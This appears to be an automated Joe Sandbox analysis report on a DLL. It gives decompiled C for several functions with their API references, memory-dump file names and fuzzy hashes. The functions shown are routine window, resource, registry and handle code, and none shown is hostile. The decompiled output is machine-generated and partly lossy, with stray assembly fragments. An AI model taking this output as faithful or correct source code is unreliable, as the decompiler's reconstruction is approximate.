				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E1001FC9C(_t51);
			}

0x10006279
0x10006279
0x10006279
0x10006279
0x10006280
0x10006285
0x10006287
0x1000628a
0x10006291
0x10006294
0x10006297
0x1000629d
0x100062ad
0x1000629f
0x100062a2
0x100062a7
0x100062a8
0x100062a8
0x100062b5
0x100062b7
0x100062b9
0x100062bb
0x100062bb
0x100062bb
0x100062c0
0x100062c0
0x100062c3
0x100062ca
0x00000000
0x00000000
0x100062cc
0x100062d5
0x100062de
0x100062e1
0x100062e4
0x100062e7
0x100062ea
0x100062ed
0x100062f0
0x100062f3
0x100062f6
0x100062fc
0x100062ff
0x10006306
0x1000630d
0x10006310
0x10006316
0x1000631c
0x10006322
0x10006325
0x10006328
0x1000632e
0x10006334
0x10006337
0x1000633a
0x1000634b

APIs

__EH_prolog3.LIBCMT ref: 10006280

Part of subcall function 10006D2B: __EH_prolog3.LIBCMT ref: 10006D32

__strdup.LIBCMT ref: 100062A2
GetCurrentThread.KERNEL32 ref: 100062CF
GetCurrentThreadId.KERNEL32 ref: 100062D8

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: 4af8da86511d4e5dd4408705f6d44fb27b71cb1393297a7f8bfc0f794a51907c
Instruction ID: a861acdeb37d33d153d410a00307fa8db88fca58120f636a03fd206092374481
Opcode Fuzzy Hash: 4af8da86511d4e5dd4408705f6d44fb27b71cb1393297a7f8bfc0f794a51907c
Instruction Fuzzy Hash: CA218CB4800B50CED721DF6AC58125AFBE8FFA4340F20891FE1AA86622CBB4A541CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000C4FC Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1000C4FC(intOrPtr* __ecx) {
				char _v20;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				struct HWND__* _t18;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t33;

				_t28 = __ecx;
				_push(0);
				_t33 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					__eax =  *__esi;
					__ecx = __esi;
					__eax =  *((intOrPtr*)( *__esi + 0x170))();
				}
				_t30 = SendMessageA;
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E1000B21C(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t28 = _t33;
				_t33 = E1000BBDF(0, _t28, SendMessageA);
				if(_t33 != 0) {
					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
					E1000B21C(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
					_t18 = GetCapture();
					if(_t18 != 0) {
						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
					}
					return _t18;
				} else {
					_push(_t28);
					_v20 = 0x10044410;
					E100209E8( &_v20, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, 0, SendMessageA, _t33);
					_t29 = E100105C8(0x104);
					_v32 = _t29;
					_t24 = 0;
					_v20 = 0;
					if(_t29 != 0) {
						_t24 = E1000E58E(_t29);
					}
					return E1001FC9C(_t24);
				}
			}

0x1000c4fc
0x1000c4fc
0x1000c4fe
0x1000c50b
0x1000c50d
0x1000c50f
0x1000c511
0x1000c511
0x1000c517
0x1000c526
0x1000c533
0x1000c538
0x1000c53f
0x1000c543
0x1000c551
0x1000c55e
0x1000c563
0x1000c56b
0x1000c572
0x1000c572
0x1000c577
0x1000c545
0x10004e71
0x10004e7b
0x10004e82
0x10004e87
0x10004e88
0x10004e8f
0x10004e9e
0x10004ea0
0x10004ea3
0x10004ea7
0x10004eaa
0x10004eac
0x10004eac
0x10004eb6
0x10004eb6

APIs

SendMessageA.USER32 ref: 1000C526
SendMessageA.USER32 ref: 1000C551

Part of subcall function 1000B21C: GetTopWindow.USER32(?), ref: 1000B22A

GetCapture.USER32 ref: 1000C563
SendMessageA.USER32 ref: 1000C572

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: MessageSend$CaptureWindow
String ID:
API String ID: 729421689-0
Opcode ID: 0651f16ed6b41e0f0b2415e49c480ceeb8609fd727ddfcdb634436d2adc50095
Instruction ID: 6be588b9800c4661a8048c77b3f4dc846bf52327d538fd1bacd6bd973810de05
Opcode Fuzzy Hash: 0651f16ed6b41e0f0b2415e49c480ceeb8609fd727ddfcdb634436d2adc50095
Instruction Fuzzy Hash: CE0184B535061C7FFA216B248CC9FBB36ADEB4C7C9F010534F2419B0A6C6915C405620

Uniqueness

Uniqueness Score: -1.00%

Function 1000DA65 Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000DA65(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				struct HRSRC__* _t25;
				void* _t28;
				intOrPtr* _t34;
				void* _t36;
				intOrPtr _t37;
				struct HINSTANCE__* _t39;

				_push(__ecx);
				_t28 = 0;
				_t40 = _a8;
				_push(_t36);
				_t34 = __ecx;
				_v8 = 0;
				if(_a8 == 0) {
					L4:
					_t37 = _a4;
					_a8 = 1;
					if(_t28 != 0) {
						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
						if(_v8 != 0) {
							FreeResource(_v8);
						}
					}
					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
					}
					_t18 = _a8;
					L10:
					return _t18;
				}
				_t39 =  *(E1000EC09(0, __ecx, _t36, _t40) + 0xc);
				_t25 = FindResourceA(_t39, _a8, 0xf0);
				if(_t25 == 0) {
					goto L4;
				}
				_t18 = LoadResource(_t39, _t25);
				_v8 = _t18;
				if(_t18 == 0) {
					goto L10;
				}
				_t28 = LockResource(_t18);
				goto L4;
			}

0x1000da68
0x1000da6a
0x1000da6c
0x1000da6f
0x1000da71
0x1000da73
0x1000da76
0x1000daab
0x1000daad
0x1000dab0
0x1000dab7
0x1000dac9
0x1000dacc
0x1000dad1
0x1000dad1
0x1000dacc
0x1000dadb
0x1000dae5
0x1000dae5
0x1000daeb
0x1000daee
0x1000daf2
0x1000daf2
0x1000da7d
0x1000da89
0x1000da91
0x00000000
0x00000000
0x1000da95
0x1000da9d
0x1000daa0
0x00000000
0x00000000
0x1000daa9
0x00000000

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1000DA89
LoadResource.KERNEL32(?,00000000), ref: 1000DA95
LockResource.KERNEL32(00000000), ref: 1000DAA3
FreeResource.KERNEL32(00000000), ref: 1000DAD1

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: c41de263a0c4a0a2ff3e2e7faac820cf06b0051920168b0b46ae1c13a6c09a32
Instruction ID: 4e046e32b577ecbefe1a9e82239a09ae3eb10ed0fe8967592b5f7829ae1b7b8f
Opcode Fuzzy Hash: c41de263a0c4a0a2ff3e2e7faac820cf06b0051920168b0b46ae1c13a6c09a32
Instruction Fuzzy Hash: 71113A71604214EFEB01DFA5C888AAE7BB9FF0A390F01806AF90697261CB75DD00CF61

Uniqueness

Uniqueness Score: -1.00%

Function 10010F7E Relevance: 6.1, APIs: 4, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10010F7E(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x10045580; // 0xe155dca3
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E10020F02( &_v24, 0x10, 0x1003809c, _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E10010F38(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E1001FBB5(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}

0x10010f7e
0x10010f84
0x10010f8b
0x10010f8f
0x10010f93
0x10010f9a
0x10010f9d
0x10010fdd
0x10010fee
0x10010f9f
0x10010fa5
0x10010fa9
0x10010fb7
0x10010fbe
0x10010fc0
0x10010fca
0x10010fca
0x10010fa9
0x10011002

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10010FB7
RegCloseKey.ADVAPI32(00000000), ref: 10010FC0
_swprintf.LIBCMT ref: 10010FDD
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10010FEE

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWrite_swprintf
String ID:
API String ID: 4210924919-0
Opcode ID: 75749d2b2382c0398083ba7cb92d29f59f37c4d48f9a02f992366f8d0876f9a2
Instruction ID: 3a2604f4cfee837da5f4817c2b18a2a2174cbb3477f90de8d09310f3c9904bd3
Opcode Fuzzy Hash: 75749d2b2382c0398083ba7cb92d29f59f37c4d48f9a02f992366f8d0876f9a2
Instruction Fuzzy Hash: 5001C07260031AABDB11DF648D86FBF77ACEF48704F400429FA01EB152DBB4E90587A0

Uniqueness

Uniqueness Score: -1.00%

Function 10016DC9 Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E10016DC9(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, RECT* _a8, int _a12) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t35;

				_t35 = _a4;
				E1000EC55( &_v12, __eflags,  *((intOrPtr*)(_t35 - 0xb0)));
				if(_a8 != 0) {
					IntersectRect( &_v28, _a8, _t35 - 0x9c);
					EqualRect( &_v28, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v28) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t35 - 0xac)) + 0x20)) + 0x20),  &_v28, _a12);
				}
				if(_v8 != 0) {
					_push(_v12);
					_push(0);
					E1000E519();
				}
				return 0;
			}

0x10016dd0
0x10016ddc
0x10016de5
0x10016e08
0x10016e15
0x10016de7
0x10016df2
0x10016df3
0x10016df4
0x10016df5
0x10016df7
0x10016e27
0x10016e3c
0x10016e3c
0x10016e47
0x10016e49
0x10016e4c
0x10016e4e
0x10016e4e
0x10016e56

APIs

IntersectRect.USER32 ref: 10016E08
EqualRect.USER32 ref: 10016E15
IsRectEmpty.USER32(?), ref: 10016E1F
InvalidateRect.USER32(?,?,?), ref: 10016E3C

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Rect$EmptyEqualIntersectInvalidate
String ID:
API String ID: 3354205298-0
Opcode ID: 2557517eccbb9696ab163556630543b7d1cc2db7da66443bf135cd333d30a12f
Instruction ID: 49a1a39e4a335cb1035e2ca36527126fc36f233e68e158b4c8e2f4d27b7ad01c
Opcode Fuzzy Hash: 2557517eccbb9696ab163556630543b7d1cc2db7da66443bf135cd333d30a12f
Instruction Fuzzy Hash: 5E11EC7690011AEFDF02DF94CC89FDE7BB9FF08349F0080A1FA05AA011D7719A559B60

Uniqueness

Uniqueness Score: -1.00%

Function 10011A48 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10011A48(void* __ecx, void* __eflags) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t11;
				int _t13;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t34;
				void* _t35;

				_push(__ecx);
				_t23 = __ecx;
				if(E10004D4A(__eflags, 0x10) == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E10011A2B(_t9);
				}
				_t11 = GetCurrentProcess();
				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
				_t34 = _t32;
				if(_t13 == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E1001C4CE(_t23, _t30, _t34, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}

0x10011a4b
0x10011a50
0x10011a5a
0x10011a67
0x10011a67
0x10011a5c
0x10011a63
0x10011a63
0x10011a7a
0x10011a83
0x10011a8b
0x10011a8c
0x10011a90
0x10011a98
0x10011a98
0x10011aa5
0x10011aa5
0x10011aad
0x10011ab3
0x10011abb

APIs

Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10011A7A
GetCurrentProcess.KERNEL32(?,00000000), ref: 10011A80
DuplicateHandle.KERNEL32(00000000), ref: 10011A83
GetLastError.KERNEL32(?), ref: 10011A9E

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: 48c76622b07e1260fdb1534259b3491da0b71c0db79951e57b58b6256fd15158
Instruction ID: ab2ce72c394f12d9cf7e836f78522521826892dae628e20e317a2ba2e4d81c76
Opcode Fuzzy Hash: 48c76622b07e1260fdb1534259b3491da0b71c0db79951e57b58b6256fd15158
Instruction Fuzzy Hash: A9017C76700204AFEB15DBA5CC89F9A7FA8DF88750F158415F905CF252EA70EC40DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000670D Relevance: 6.0, APIs: 4, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000670D(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* _t16;
				int _t17;
				int _t18;
				struct HWND__* _t19;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t35;

				_t32 = __edi;
				_t35 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					__eflags =  *((intOrPtr*)(__ecx + 0x14));
					if(__eflags == 0) {
						L3:
						_t17 = E10004E6E(0, _t25, _t32, _t35, _t39);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t35 + 0x18)) = 1;
						return _t18;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						_push(__edi);
						_t33 =  *((intOrPtr*)(__ecx + 0x14));
						_t19 = GetFocus();
						__eflags = _t19 -  *(_t33 + 0x20);
						if(_t19 ==  *(_t33 + 0x20)) {
							SendMessageA( *(E1000A8F0(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E1000EFCE( *((intOrPtr*)(_t35 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}

0x1000670d
0x1000670f
0x10006711
0x10006718
0x1000674d
0x10006750
0x10006727
0x10006727
0x1000672c
0x10006732
0x10006745
0x10006790
0x10006790
0x00000000
0x10006790
0x10006752
0x10006756
0x10006758
0x10006759
0x1000675c
0x10006762
0x10006765
0x1000677d
0x1000677d
0x10006783
0x1000678b
0x00000000
0x1000678b
0x1000671d
0x1000671f
0x10006722
0x10006725
0x00000000
0x00000000
0x00000000
0x10006725
0x10006799

APIs

EnableMenuItem.USER32 ref: 10006745

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

GetFocus.USER32 ref: 1000675C
GetParent.USER32(?), ref: 1000676A
SendMessageA.USER32 ref: 1000677D

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
String ID:
API String ID: 3849708097-0
Opcode ID: da181488fd32ae85599c137ac0e4151e4cf157de9effc839c6b85ff350a25f58
Instruction ID: e2afc09dcdd242cfcc452f6720a74c3cb54d3460b69826f3dc14470d92f8e7be
Opcode Fuzzy Hash: da181488fd32ae85599c137ac0e4151e4cf157de9effc839c6b85ff350a25f58
Instruction Fuzzy Hash: 88118E71504611EFE721DF20CC8881AB7F6FF88399B21CA2DF15A46969CB30BC44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000B21C Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1000B21C(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E1000A917(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E1000AF41(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E1000B21C(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}

0x1000b21c
0x1000b21c
0x1000b224
0x1000b22a
0x1000b28d
0x1000b28d
0x1000b291
0x00000000
0x00000000
0x1000b22e
0x1000b232
0x1000b25c
0x1000b234
0x1000b235
0x1000b23a
0x1000b23c
0x1000b23e
0x1000b241
0x1000b244
0x1000b247
0x1000b24a
0x1000b24b
0x1000b24b
0x1000b23c
0x1000b262
0x1000b266
0x1000b269
0x1000b26b
0x1000b26d
0x1000b27f
0x1000b27f
0x1000b26d
0x1000b287
0x1000b287
0x1000b296

APIs

GetTopWindow.USER32(?), ref: 1000B22A
GetTopWindow.USER32(00000000), ref: 1000B269
GetWindow.USER32(00000000,00000002), ref: 1000B287

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: e0b1c7dcaef5420272ec71e23bd9130895c4420cb30c111c889f194c57433dfc
Instruction ID: bb9f297338e09c47c4769c98d14c4203ded29529c07ae9fe16b63de4f6ec589b
Opcode Fuzzy Hash: e0b1c7dcaef5420272ec71e23bd9130895c4420cb30c111c889f194c57433dfc
